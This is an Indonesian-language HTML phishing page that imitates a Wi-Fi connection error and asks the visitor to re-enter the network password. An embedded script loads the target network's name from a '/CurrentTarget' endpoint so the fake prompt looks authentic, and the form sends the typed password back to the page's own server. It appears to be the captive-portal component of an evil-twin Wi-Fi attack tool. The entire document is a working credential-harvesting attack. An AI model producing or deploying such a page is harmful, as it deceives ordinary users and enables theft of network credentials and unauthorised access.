<!DOCTYPE html>
<html>
  <head>
    <title id="TARGET">Masukkan ulang password</title>
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
      article {
        background: #f2f2f2;
        padding: 1.3em;
      }

      body {
        color: #333;
        font-family: Century Gothic, sans-serif;
        font-size: 18px;
        line-height: 24px;
        margin: 0;
        padding: 0;
      }

      div {
        padding: 0.5em;
      }

      h1 {
        margin: 0.5em 0 0 0;
        padding: 0.5em;
      }

      h2 {
        margin: 0.5em 0 0 0;
        padding: 0.5em;
        color: red
      }

      input {
        width: 100%;
        padding: 9px 10px;
        margin: 8px 0;
        box-sizing: border-box;
        border-radius: 0;
        border: 1px solid #555555;
      }

      label {
        color: #333;
        display: block;
        font-style: italic;
        font-weight: bold;
      }

      nav {
        background: #0066ff;
        color: #fff;
        display: block;
        font-size: 1.3em;
        padding: 1em;
      }

      nav b {
        display: block;
        font-size: 1.5em;
        margin-bottom: 0.5em;
      }

      textarea {
        width: 100%;
      }
    </style>
  </head>
  <body>
    <nav>
        <b id="SSID">&nbsp</b>
        <p>Error 509 : Sambungan Wi-Fi gagal.</p>
    </nav>
    <div>
      <h1>Masukkan ulang password</h1>
    </div>
    <div>
      <div>Masukkan password Wi-Fi untuk melanjutkan.</div>
      <div>
        <form action="/">
          <b>Password:</b>
          <center>
            <input type="password" name="password" minlength="8">
            <input type="submit" value="Lanjutkan">
          </center>
        </form>
      </div>
      <div class="q">
        <a>All rights reserved 2023.</a>
      </div>
    </div>
	<script>
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function(){
            if(this.readyState == 4 && this.status == 200) {
                document.getElementById("SSID").innerHTML = this.responseText
            }
            }
        xhttp.open("GET", "/CurrentTarget", true);
        xhttp.send();
	</script>
  </body>
</html>